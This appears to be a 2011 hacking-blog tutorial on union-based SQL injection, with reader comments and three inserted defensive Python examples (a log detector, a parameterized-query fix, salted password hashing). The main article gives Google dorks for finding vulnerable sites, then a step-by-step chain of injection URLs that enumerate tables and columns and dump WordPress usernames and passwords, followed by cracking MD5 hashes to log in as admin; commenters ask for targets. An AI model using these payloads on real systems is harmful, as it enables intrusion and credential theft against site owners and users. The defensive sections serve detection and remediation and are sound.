SQL Injection Part 2 - Explained With An Example

In my previous article, SQL Injection Part 1, I explained how we can hack websites using simple SQL injections. Today I will explain how we can hack websites using more advanced SQL injections. There are already a number of articles on different blogs about SQL injection, so I thought of writing this one around a worked example to give you a better understanding.

In my previous article I covered all the basic stuff regarding SQL; today I will get directly into the injection part. If you have not read the previous part, SQL Injection Part 1, kindly go through it before reading this one.


Finding Out A Vulnerable Website
We can use Google dorks to find vulnerable sites. If you want to find an SQLi vulnerability on a particular website, you can also use Google dorks for that. All you need is a basic knowledge of advanced Google searching.

Here are some Google dorks.
inurl:article.php?ID=
inurl:newsDetail.php?id=
inurl:view.php?id=
inurl:page.php?id=
inurl:productdetail.php?id=

Now we have to check for the vulnerability. To do this, add a single quote (') at the end of the URL. If you get an error or a blank page, the site is vulnerable to SQL injection: the quote has broken the SQL statement that the page builds from the id parameter.

Here I found a vulnerable link on a website.
www.vulnerablesite.com/view.php?id=47


When I add a single quote at the end of the URL, some of the page's data is missing. Hence we can determine that it is vulnerable to SQL injection.
www.vulnerablesite.com/view.php?id=-47'



Finding Out The Number Of Columns
Now our job is to find out the number of columns the page's query returns, so that we can match it with our own query later. We can find this by simply adding an "order by" clause at the end, as shown below.
www.vulnerablesite.com/view.php?id=47 order by 1-- (no error)
It should return the page with no error.
Now add one more column to the above query. It looks like
www.vulnerablesite.com/view.php?id=47 order by 2-- (no error)
Keep increasing the number until you get an error. The error means that the query has no column at that position, so there are no more columns to return.

In my example I got an error at the following query.
www.vulnerablesite.com/view.php?id=47 order by 10-- (error)
It means that the query returns 9 columns.



Finding Out The Most Vulnerable Column
When we are done with the number of columns, we need to find the most vulnerable column, that is, the column whose value the page actually displays. For this we use the following query.
www.vulnerablesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9--
The page should now show the numbers of the columns it displays. Sometimes the numbers may not appear on your page. In such cases add '-' (without quotes) before your id number. This makes the original query match no row, so the page displays the row from our union instead.

Then the above query looks like
www.vulnerablesite.com/view.php?id=-47 union select 1,2,3,4,5,6,7,8,9--

In my example, 2 was displayed on the page, so column 2 is the most vulnerable one. The most interesting part of our attack starts here: extracting data from the database.


Finding Out The Table Names
First we will find out the table names in the database. Just put table_name in the vulnerable column and select from information_schema.tables, as in the following query.
www.vulnerablesite.com/view.php?id=-47 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

It gives us a list of tables.


Now search for the tables you are interested in. A hacker generally looks for the tables that contain usernames and passwords. So select the table you want.
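From the defender's side, the steps above leave a recognizable trail in the web server's access log: a quoted id, a run of "order by N" requests, then "union select" and "information_schema". The following is an added example (not part of the article or the author's code) that scans Apache-style log lines for those patterns and tallies them per client IP. The log lines, IP addresses, paths and thresholds are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache "common" format log lines, made up for this example.
# 203.0.113.5 walks through the article's steps; 198.51.100.7 is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Nov/2011:02:10:01 +0000] "GET /view.php?id=47 HTTP/1.1" 200 5120
203.0.113.5 - - [09/Nov/2011:02:10:07 +0000] "GET /view.php?id=47%27 HTTP/1.1" 500 312
203.0.113.5 - - [09/Nov/2011:02:10:15 +0000] "GET /view.php?id=47%20order%20by%201-- HTTP/1.1" 200 5120
203.0.113.5 - - [09/Nov/2011:02:10:21 +0000] "GET /view.php?id=47%20order%20by%202-- HTTP/1.1" 200 5120
203.0.113.5 - - [09/Nov/2011:02:10:40 +0000] "GET /view.php?id=47%20order%20by%2010-- HTTP/1.1" 500 312
203.0.113.5 - - [09/Nov/2011:02:11:02 +0000] "GET /view.php?id=-47%20union%20select%201,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 4870
203.0.113.5 - - [09/Nov/2011:02:11:30 +0000] "GET /view.php?id=-47%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables-- HTTP/1.1" 200 9015
198.51.100.7 - - [09/Nov/2011:02:11:35 +0000] "GET /view.php?id=12 HTTP/1.1" 200 4412
198.51.100.7 - - [09/Nov/2011:02:11:48 +0000] "GET /page.php?id=3 HTTP/1.1" 200 3980
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Each signature is matched against the URL-decoded request path.
SIGNATURES = {
    "quote_after_number": re.compile(r"[?&]id=-?\d+'", re.I),          # the single-quote test
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),          # column counting
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),  # column display / extraction
    "schema_read": re.compile(r"\binformation_schema\.", re.I),          # table and column listing
}

def parse_line(line):
    """Split one log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def scan_log(text):
    """Return {ip: {signature: count}} for every client that tripped a signature.
    Flagged requests that drew a 5xx are counted too: a database error page is
    exactly the feedback the probing relies on, and it shows up in the status column."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        decoded = unquote_plus(entry["path"])
        matched = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        for name in matched:
            hits[entry["ip"]][name] += 1
        if matched and entry["status"].startswith("5"):
            hits[entry["ip"]]["server_error"] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}

def suspicious_clients(text, min_hits=2):
    """IPs whose signature hits reach the threshold; one hit alone can be a false positive."""
    return sorted(ip for ip, counts in scan_log(text).items()
                  if sum(v for k, v in counts.items() if k != "server_error") >= min_hits)

if __name__ == "__main__":
    for ip, counts in scan_log(SAMPLE_LOG).items():
        print(ip, counts)
    print("suspicious:", suspicious_clients(SAMPLE_LOG))
```

The threshold matters: a single "order by" in a URL can be legitimate, but the sequence of a quote, several "order by N" probes and a "union select" from one address within a minute is the pattern worth alerting on, and the 5xx responses to the probes are the same error pages the article tells the attacker to look for.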


Finding Out The Column Names
Now we need to extract the column names from the table in order to extract the data. We can find the column names using the following query.
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='yourtablename'--

In my example the query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='wp_users'--



It displays all the column names from the table 'wp_users'.



Extracting Data
Now we have to extract the information such as usernames, passwords, etc.

We can do this as shown in the following query, where column_name is the column you want to read and yourtablename is the table you selected.
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from yourtablename--
In my example this query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,user_login,3,4,5,6,7,8,9 from wp_users--
Similarly you can get the password with the same query by simply replacing user_login with user_pass, the password column in my example.
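The whole chain above, run against a toy database. This is an added example written for this article, not the author's code or the site's code. It uses Python's sqlite3 module as a stand-in for the PHP/MySQL page; the table names and rows are constructed for the demo, and since sqlite has no information_schema the table-listing step is left out. The vulnerable handler shows why the single quote, the "order by" probe and the union step behave as described; the hardened handler shows the fix: cast the id to an integer and bind it as a query parameter, so the value can never become part of the SQL text.

```python
import sqlite3

def build_db():
    """Constructed in-memory stand-in for the site's backend (example data only)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE wp_users(ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO articles VALUES (47, 'Welcome', 'Hello world');
        INSERT INTO wp_users VALUES (1, 'admin', 'HASH-PLACEHOLDER');
    """)
    return conn

def view_vulnerable(conn, raw_id):
    """The pattern behind a vulnerable view.php?id=...: the parameter is pasted
    straight into the SQL text, so whatever follows the number becomes SQL."""
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def probe_vulnerable(conn, raw_id):
    """True if the page would render normally, False if the database raised an
    error (the 'error or blank page' signal the article keys on)."""
    try:
        view_vulnerable(conn, raw_id)
        return True
    except sqlite3.OperationalError:
        return False

def view_hardened(conn, raw_id):
    """Fixed handler: validate the type, then bind the value as a parameter.
    The driver passes the value separately from the SQL text, so it cannot
    add clauses to the statement no matter what it contains."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return None  # reject the request; a real handler would answer HTTP 400
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print(view_vulnerable(db, "47"))
    # the single-quote test: a broken statement means an error page
    print(probe_vulnerable(db, "47'"))
    # column counting: this query has 3 columns, so 'order by 3' works and 'order by 4' errors
    print(probe_vulnerable(db, "47 order by 3--"), probe_vulnerable(db, "47 order by 4--"))
    # the union step from the article, sized for a three-column query
    print(view_vulnerable(db, "-47 union select 1,user_login,3 from wp_users--"))
    # the same inputs against the hardened handler
    print(view_hardened(db, "47"))
    print(view_hardened(db, "47'"), view_hardened(db, "-47 union select 1,user_login,3 from wp_users--"))
```

Note what the fix does and does not do: parameter binding removes the injection entirely, while input validation on its own (rejecting anything that is not an integer) happens to be enough here only because the parameter is numeric; for string parameters the binding is what matters.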

Many websites store passwords as MD5 hashes. So we have to crack them using any MD5 cracker; www.md5cracker.co.uk is an online service that cracks MD5 hashes. Then find the admin page and log in to the website.
For more about MD5, kindly read the tutorial on hashes and salts here.
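Why an online MD5 cracker works so easily, and what a site should store instead, as an added example that is not from the article: an unsalted MD5 digest of a password is the same for every user on every site, so one precomputed lookup cracks all of them at once. A salted, iterated hash such as PBKDF2 from Python's hashlib gives every record its own random salt and iteration count, so identical passwords produce different records and each one has to be attacked separately. The record format used here is my own construction for the example.

```python
import hashlib
import hmac
import os

def md5_record(password):
    """The storage the article describes: a bare, unsalted MD5 digest."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def pbkdf2_record(password, salt=None, iterations=200_000):
    """Salted, iterated hash. The record format
    'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>' is constructed for
    this example so that verification can read back its own parameters."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for every record
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def pbkdf2_verify(password, record):
    """Recompute the hash with the salt and iteration count stored in the
    record and compare in constant time, so the check itself leaks nothing."""
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256" or not parts[1].isdigit():
        return False
    _, iterations, salt_hex, digest_hex = parts
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)

def same_record_for_same_password(make_record, password):
    """True if two users who pick the same password end up with identical
    stored records, which is what makes a precomputed MD5 lookup table work."""
    return make_record(password) == make_record(password)

if __name__ == "__main__":
    print("md5    :", md5_record("password"), same_record_for_same_password(md5_record, "password"))
    rec = pbkdf2_record("password")
    print("pbkdf2 :", rec, same_record_for_same_password(pbkdf2_record, "password"))
    print("verify :", pbkdf2_verify("password", rec), pbkdf2_verify("Password", rec))
```

The iteration count is the second defence: each guess against a PBKDF2 record costs the attacker the same 200,000 rounds it costs the site, whereas MD5 is designed to be fast. Dedicated password hashes (bcrypt, scrypt, Argon2) are the usual choice in practice; PBKDF2 is shown here because it ships with the standard library.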

Hope you enjoyed this tutorial. Please leave your comments for further doubts and clarifications.
About the Guest Author:
This article is written by Mr Srinivas. He owns Hackinginception, where he writes articles related to hacking. If you are interested in writing a guest post @Hackaholic, please contact me.


Anonymous

Thanks, this helped me :)

Anonymous

It's not complete. How to get the password? Tell the last step also.

srinivas said on November 9, 2011 at 2:28 AM :

@Anonymous
Bro, read it completely....
The following query gives you the user name.
www.vulnerablesite.com/view.php?id=-47 union select 1,user_login,3,4,5,6,7,8,9 from wp_users--

By replacing "user_login" with "user_pass" in the same query, you can get the password. :)

phaninaidu said on August 19, 2012 at 9:30 PM :

Hi bro, when I put an ' at the end of the URL and it gets an error page, can I hack it?

Tarash Sajaia said on November 26, 2012 at 6:13 AM :

Please write the URL or PM me in Google of this site.

ANON said on December 26, 2012 at 3:34 AM :

Hi bro, just want to ask some details regarding finding out the table name...

www.vulnerablesite.com/view.php?id=-47 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

In your example above you replaced "2" with table_name.
Is "table_name" a predefined parameter in SQL?

Same question regarding information_schema.tables (is this also a predefined parameter?)

Because if it is, then I assume it will always work.

Thanks bro


© 101hacker | Design by Mukund edited by John